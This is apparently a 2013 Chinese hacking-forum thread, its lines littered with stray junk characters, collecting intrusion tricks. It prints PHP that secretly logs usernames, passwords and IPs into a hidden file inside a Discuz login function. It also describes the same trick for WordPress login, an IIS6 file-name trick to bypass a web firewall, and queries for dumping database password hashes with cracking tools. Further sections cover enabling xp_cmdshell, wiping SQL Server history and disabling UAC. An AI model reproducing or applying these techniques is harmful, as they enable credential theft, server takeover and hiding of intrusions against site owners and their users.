' x& b+ i. x# C8 T% q! G当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
1 C6 C6 Q r" P% y就是搜索case ‘login’
9 k8 g' L' w& _+ O* {: M" _5 i8 }在它下面直接插入即可,记录的密码生成在pwd.txt中,
+ {7 d# n5 d! b/ L7 D- S其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录5 M& r& Y" O: G
利用II6文件解析漏洞绕过安全狗代码:
5 _) Q3 u T6 R- @# Q;antian365.asp;antian365.jpg8 i. I9 i- v+ p
" B( l$ X4 |3 M/ r. u9 A7 s
各种类型数据库抓HASH破解最高权限密码!
5 {; u$ H) {- a; p& l! Z# G/ x; H1.sql server2000, `0 g$ ^0 Z( ]# j
SELECT password from master.dbo.sysxlogins where name='sa' M0 |6 W' m# `, L9 I
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
, E# o( l/ D5 ]2FD54D6119FFF04129A1D72E7C3194F7284A7F3A7 y, K! w7 s. G! W. r8 ~# ]
1 M; H2 _7 Y3 [9 s) a0×0100- constant header& e7 Y/ S5 G/ N( R: f/ @. ]
34767D5C- salt' r; A/ P# F% B! D+ V3 T
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
5 d( u1 W3 a: D4 C6 s* l% _2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash1 Q, z" L8 [3 y1 `7 R+ y1 [+ i
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
% C6 r6 U( X! a2 GSQL server 2005:-/ y. h1 W. B2 e6 I
SELECT password_hash FROM sys.sql_logins where name='sa', I7 G+ e% a) ~$ S8 z, f9 t
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F* [7 h1 h3 E( Y4 s/ w0 }1 V
0×0100- constant header
! s/ w5 x" Z4 `! `* A993BF231-salt
! c$ o+ I) u. G v# [5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
4 s1 s) X9 l) e; ?# a& s# Tcrack case sensitive hash in cain, try brute force and dictionary based attacks.
: H/ p8 V2 w% @! r' R1 X% d5 ?' r# \" v3 A7 W
update:- following bernardo’s comments:-6 \) J2 P8 w* k) a
use function fn_varbintohexstr() to cast password in a hex string.% r5 C8 J( G3 z3 D: q6 Q- X
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
3 T s" q% [ r& p$ b) j
0 v! s I: @( ^0 H, B/ r. y; v' cMYSQL:-
3 P% J8 u2 i7 O- \) y% A3 y2 m3 f; \8 w, B" }
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.5 T+ y" |$ F, T0 Q3 m6 A+ r# L! j
: [ X/ D) c1 B& G+ o3 O* }' W* o*mysql < 4.1# p7 l* |& J, ?/ n
# t8 r$ d& |, hmysql> SELECT PASSWORD(‘mypass’);% s3 N2 U" |2 `: Z6 t U
+——————–+5 J8 ?* k* w6 ~: @2 q: R! d9 S
| PASSWORD(‘mypass’) |% C. A. ]* S5 K& J/ p0 d* f
+——————–+
: C L3 H1 R" m, F! y| 6f8c114b58f2ce9e |
, \9 m; x% m, h5 n) p+——————–++ l! u4 Y0 z& z6 H! J7 e4 W
7 L1 k& b. P/ P" s+ h: U1 y+ }
*mysql >=4.1
! }; `4 z6 q( y
7 ` K7 H. x+ jmysql> SELECT PASSWORD(‘mypass’);
4 Q4 @6 ?7 D* v/ B( u+——————————————-+: q9 d+ j' K* C. h: Z
| PASSWORD(‘mypass’) |
/ D6 w9 A: O! X1 O, d" x" _6 F+——————————————-+% w% j: A& P: k6 ]! Y1 k
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
8 Y Z8 @' W8 N& [5 I* ]& E+——————————————-+
- `' C5 k9 L- p8 r, ]
& s* H: ?* w' ~, GSelect user, password from mysql.user# q u6 l) g4 D; k1 v- |7 B& q$ Z/ T
The hashes can be cracked in ‘cain and abel’
( @* d% c8 I: q2 f) C" y1 p" a6 h1 a o& M5 i% q% h
Postgres:-& P4 X+ X6 |' a) S, r1 ~5 W! i
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
. j5 x, K% \3 L6 Z! kselect usename, passwd from pg_shadow; j* E% ]. `: k5 m q7 W
usename | passwd
. h l! V# M. U, ]! C7 S——————+————————————-
$ |6 Z" ~; \$ x( O% [- @testuser | md5fabb6d7172aadfda4753bf0507ed4396
7 k- Q- K! A$ l3 K5 _9 iuse mdcrack to crack these hashes:-
2 a7 O0 ]# p& Q' Q$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
( G# a `5 c1 a8 F2 @/ D; h0 X2 |5 D9 ^$ x
Oracle:-
% l, o- \) V! |& aselect name, password, spare4 from sys.user$" e( Y6 _2 J- \$ O* d- v
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
( _! e. d$ q8 qMore on Oracle later, i am a bit bored….5 Z& C5 O* y: Y: B: y
3 ~& T: B! p5 x3 U) ?6 I
, |) b+ W3 [3 w5 g+ U+ p( s; g. v在sql server2005/2008中开启xp_cmdshell
6 |- Z5 V/ U& v5 N3 f-- To allow advanced options to be changed.
3 x, w1 b0 `$ v$ o7 \# G- N- l5 w2 rEXEC sp_configure 'show advanced options', 1
" d( C3 a/ {& u" h, n$ mGO# R' x! N& I! o' N X
-- To update the currently configured value for advanced options.$ N/ J3 h& D/ j- f. V
RECONFIGURE4 F! G2 I5 |2 ?. m! D6 z+ c& b
GO4 p- I1 ~3 H$ K8 s) N$ w
-- To enable the feature.
# X* n3 M- J/ L; D9 C E- E' xEXEC sp_configure 'xp_cmdshell', 14 P( y0 C& d, q8 Y
GO
0 d9 N4 a6 n6 B9 v/ n-- To update the currently configured value for this feature.
! C ?' z) J* k4 @RECONFIGURE+ J; |, k4 v3 H: W
GO5 r$ E0 Q! d# Y9 N ]
SQL 2008 server日志清除,在清楚前一定要备份。; P" ~; C' Z$ ? U3 a1 {: Z2 x5 V% J
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
6 A% Y% }# }" HX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin: ^: m6 Z( F$ G- Q
" x" a1 G' C9 m( l% `$ [/ ~
对于SQL Server 2008以前的版本:# m0 r9 z8 b' g; J7 V
SQL Server 2005:( r+ F0 M. O! o- n @+ b
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat0 I. E1 d( x. O8 k/ `1 L
SQL Server 2000:4 v; ~: |: X; i; ?( s7 ^0 p
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。4 e. b$ L6 u- ^$ r
+ d5 s% T* R: U- Z5 D) h J2 B本帖最后由 simeon 于 2013-1-3 09:51 编辑& \. ]7 T. |) Z
& @. T% L7 }* n/ ]
! [+ o+ S/ Z. L5 e! n* B: Q0 k
windows 2008 文件权限修改! a, p; ~2 x) U2 K: x/ h
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
( |3 Y5 T5 b" U6 t2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
! O9 D& m6 c4 K一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,' L* ]3 L! ?/ I1 W- Q
2 o* P/ O7 Z j5 r5 a
Windows Registry Editor Version 5.00% e3 e% c0 ]$ N1 \
[HKEY_CLASSES_ROOT\*\shell\runas]
$ d0 W' A, X7 G2 e- t( Y( ]# w3 v@="管理员取得所有权"3 `: X6 T1 L8 ]8 v2 f8 v, r% ^
"NoWorkingDirectory"=""1 H, o0 J* V p
[HKEY_CLASSES_ROOT\*\shell\runas\command]% O9 ^4 L9 A q$ P9 B: f
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 L% G' `: d8 J0 D ?
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
. J8 F+ L* b4 D$ S& @3 a[HKEY_CLASSES_ROOT\exefile\shell\runas2]5 h1 X1 N5 j* h; M9 G
@="管理员取得所有权"
, o. b; ^" {# }"NoWorkingDirectory"=""7 \6 k, P" I5 J. i# B8 k$ f7 Q! U
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]& ?- _: b# l" G6 ?# g, F: I3 N' ^8 U
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". K0 i+ L V2 ~
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", J! \! B* K( T
# g7 }% h4 n% G- }# s( ^: w9 q
[HKEY_CLASSES_ROOT\Directory\shell\runas]7 _8 k( K) y4 V/ L
@="管理员取得所有权"
4 u+ l4 B+ Q/ f( x& ?"NoWorkingDirectory"=""
0 A* y" J+ z! c6 Q[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
; \5 X7 E* P7 S* Q+ X@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
5 H; Y, {" L4 L- M"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
/ M6 ]9 D7 M3 k
4 `- O3 K V3 v* F
. L) \: g/ v, l! h9 M! Qwin7右键“管理员取得所有权”.reg导入7 O( {$ ~) {1 Q6 a: Y' m, b
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,9 `4 C& t6 N$ |& x, M
1、C:\Windows这个路径的“notepad.exe”不需要替换& }4 e A& M9 B5 Z
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
~" A% u+ k' D/ \) ^7 l3、四个“notepad.exe.mui”不要管
2 L7 x6 ?/ D* ]; Q" c3 {4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和6 x0 h6 C( O# y; d/ d- F
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
2 _: f ]* ^( m) h替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,5 l: W4 u2 h# o* \
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
5 Z) G' c5 u C; _' E9 zwindows 2008中关闭安全策略: , F6 I$ ]& m: }. v8 o4 m
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f. R* ]. E" {- d# Z7 i- B7 t% G
修改uc_client目录下的client.php 在/ T8 b6 a y0 |
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {$ \* X# R7 R6 U; |
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php4 g3 l$ S. ^7 d# O) F* z$ n
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
1 u% a/ W5 [/ N( t; D2 T1 P9 bif(getenv('HTTP_CLIENT_IP')) {& `- X8 R0 w$ q' s. h
$onlineip = getenv('HTTP_CLIENT_IP');# E- q5 C" Y0 {* e! C! @5 q
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
* D/ M9 C2 x- {5 U) P. \$onlineip = getenv('HTTP_X_FORWARDED_FOR');
* n K: y6 i* T6 v} elseif(getenv('REMOTE_ADDR')) {
; d& @% w$ \. g# R" C$onlineip = getenv('REMOTE_ADDR');
/ `3 T9 Z# c& I z8 m8 j} else {
3 S7 i- d) j9 b) e9 P$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];9 R# z9 d. {0 W$ @0 l) l' H
}. x; [6 i% a, A: P2 L5 i
$showtime=date("Y-m-d H:i:s");
9 e; W; g9 { n $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
) {' i* c+ j% J+ i/ N8 e. b. D) z $handle=fopen('./data/cache/csslog.php','a+');
1 D; a; F( \% P( ~' M $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对